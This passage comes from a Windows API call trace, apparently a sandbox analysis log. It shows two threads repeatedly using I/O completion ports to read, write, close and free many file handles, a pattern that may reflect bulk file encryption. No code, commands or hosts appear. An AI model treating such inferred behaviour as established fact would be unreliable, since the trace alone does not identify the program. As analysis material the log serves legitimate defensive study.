(in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.005] ReadFile (in: hFile=0x630, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4dc0020) returned 1 [0156.005] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.006] WriteFile (in: hFile=0x134, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x17ca3, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020) returned 1 [0156.028] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.029] WriteFile (in: hFile=0x2e0, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x5c55, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4a60020) returned 1 [0156.035] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.035] WriteFile (in: hFile=0x630, lpBuffer=0x4dc0124, nNumberOfBytesToWrite=0xdc02, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4dc0020) returned 0x0 [0156.042] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.044] WriteFile (in: hFile=0x610, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4820020) returned 1 [0156.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0156.068] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0156.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0156.068] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0156.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.068] ReadFile (in: hFile=0x630, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4dc0020) returned 0x0 [0156.068] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.068] CloseHandle (hObject=0x1a8) returned 1 [0156.078] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2880020) returned 1 [0156.078] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.082] WriteFile (in: hFile=0x368, lpBuffer=0x4b80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4b80020) returned 1 [0156.090] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.090] CloseHandle (hObject=0x2e0) returned 1 [0156.097] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0156.098] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.098] CloseHandle (hObject=0x668) returned 1 [0156.127] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ca0020) returned 1 [0156.128] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 Thread: id = 126 os_tid = 0x92c [0136.131] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.714] ReadFile (in: hFile=0x624, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4820020) returned 1 [0147.714] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.718] ReadFile (in: hFile=0x65c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0147.718] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.718] WriteFile (in: hFile=0x624, lpBuffer=0x4820124, nNumberOfBytesToWrite=0x9981, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4820020) returned 0x0 [0147.725] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.725] WriteFile (in: hFile=0x61c, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0147.737] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.737] WriteFile (in: hFile=0x624, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4820020) returned 1 [0147.749] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.749] WriteFile (in: hFile=0x628, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020) returned 1 [0147.755] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.764] CloseHandle (hObject=0x620) returned 1 [0147.773] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0147.774] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.903] ReadFile (in: hFile=0x64c, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2f30020) returned 1 [0147.971] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.971] ReadFile (in: hFile=0x628, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4280020) returned 1 [0147.972] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.972] ReadFile (in: hFile=0x61c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4700020) returned 1 [0147.972] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.972] ReadFile (in: hFile=0x648, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4820020) returned 1 [0147.972] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.973] ReadFile (in: hFile=0x618, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4940020) returned 1 [0147.973] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0147.973] WriteFile (in: hFile=0x64c, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x10ff8, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2f30020) returned 1 [0148.006] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0148.006] WriteFile (in: hFile=0x61c, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0xbb9b, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020) returned 1 [0148.009] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0148.009] WriteFile (in: hFile=0x618, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0xfc89, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020) returned 1 [0148.017] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0148.017] WriteFile (in: hFile=0x628, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4280020) returned 1 [0148.025] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0148.025] WriteFile (in: hFile=0x618, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020) returned 1 [0148.054] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0148.054] CloseHandle (hObject=0x648) returned 1 [0148.067] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0148.068] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0149.052] CloseHandle (hObject=0x670) returned 1 [0149.069] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0149.070] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0149.934] ReadFile (in: hFile=0x648, lpBuffer=0x5360124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x5360020 | out: lpBuffer=0x5360124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x5360020) returned 1 [0149.935] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0149.995] WriteFile (in: hFile=0x65c, lpBuffer=0x5240094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x5240020 | out: lpBuffer=0x5240094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x5240020) returned 1 [0150.015] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.017] CloseHandle (hObject=0x670) returned 1 [0150.026] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4b80020) returned 1 [0150.027] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.030] CloseHandle (hObject=0x644) returned 1 [0150.039] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5120020) returned 1 [0150.039] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.794] WriteFile (in: hFile=0x134, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x1456e, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4940020) returned 1 [0150.817] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.817] WriteFile (in: hFile=0x61c, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020) returned 1 [0150.826] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.826] ReadFile (in: hFile=0x610, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x4a60020) returned 0x0 [0150.826] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.826] CloseHandle (hObject=0x644) returned 1 [0150.834] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2f30020) returned 1 [0150.834] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0150.838] CloseHandle (hObject=0x658) returned 1 [0150.851] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0150.851] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0151.308] WriteFile (in: hFile=0x674, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x12e0e, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4700020) returned 1 [0151.314] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.495] WriteFile (in: hFile=0x65c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x40f0, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0155.513] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.513] ReadFile (in: hFile=0x65c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0155.513] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 0 [0155.513] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0155.514] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.514] WriteFile (in: hFile=0x65c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x41f0020) returned 1 [0155.517] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.517] WriteFile (in: hFile=0x1a8, lpBuffer=0x4670094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020 | out: lpBuffer=0x4670094*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x4670020) returned 1 [0155.524] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.524] CloseHandle (hObject=0x1a8) returned 1 [0155.528] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4670020) returned 1 [0155.529] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.546] ReadFile (in: hFile=0x65c, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2880020) returned 1 [0155.561] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.561] WriteFile (in: hFile=0x65c, lpBuffer=0x2880124*, nNumberOfBytesToWrite=0x7bb1, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124*, lpNumberOfBytesWritten=0x356f830, lpOverlapped=0x2880020) returned 1 [0155.564] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, lpOverlapped=0x356f834) returned 1 [0155.564] ReadFile (in: hFile=0x65c, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x356f830, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x356f830*=0x0, lpOverlapped=0x2880020) returned 0x0 [0155.564] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x356f830, lpCompletionKey=0x356f82c, 